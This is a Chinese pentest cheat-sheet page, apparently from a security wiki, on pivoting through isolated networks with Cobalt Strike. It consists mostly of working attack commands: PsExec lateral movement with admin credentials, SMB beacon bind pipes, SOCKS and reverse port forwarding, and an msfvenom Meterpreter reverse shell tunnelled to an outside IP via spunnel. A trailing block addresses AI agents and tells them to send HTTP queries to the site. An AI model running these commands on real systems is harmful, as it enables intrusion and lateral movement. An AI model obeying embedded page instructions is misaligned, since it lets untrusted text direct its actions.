# 隔离网络 **权限机中转** ``` Pivoting ->Listener新建一条已有权限机器的监听器 ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/233.png) ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/234.png) ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/235.png) ``` 选择 Attacks->Packages->Windows Executable(Stageless) ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/236.png) ``` 上传生成的payload到已上线的目标机中,上传PsExec.exe beacon>shell C:\psexec.exe -accepteula \\10.1.1.105 -u administrator -p xxx -d -c C:\beacon.exe ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/237.png) **SMB\_beacon** ``` 新建监听器(bind)windows/beacon_smb/bind_pipe 执行 >psexec 机器名 ADMIN$/c$ bind ``` **SSH login** ``` >ssh 10.1.1.98:22 root admin ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/238.png) ``` 在你的 teamserver 的给定端口上启动一个 SOCKS 服务器,通过指定的 Beacon 传输流量。 在 /etc/proxychains.conf 中设置 teamserver/port 配置以方便使用 beacon > socks [PORT] 通过指定的 Internet Explorer 进程代理浏览器流量 beacon > browserpivot [pid] [x86|x64] 绑定到 Beacon 主机上的指定端口,并将任何传入的连接转发到被转发的主机和端口 beacon > rportfwd [bind port] [forward host] [forward port] spunnel : 生成一个代理并创建一个到其控制器的反向端口转发隧道 msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o /tmp/msf.bin beacon> spunnel x64 184.105.181.155 4444 C:\Payloads\msf.bin spunnel_local: 生成一个代理并创建一个反向端口转发,通过您的 Cobalt Strike 客户端隧道传输到其控制器 然后你可以在你的 MSF multi handler上处理连接 beacon> spunnel_local x64 127.0.0.1 4444 C:\Payloads\msf.bin ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.heresecurity.wiki/nei-wang-he-yu/ming-ling-yu-kong-zhi/cobaltstrike/ge-li-wang-luo.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.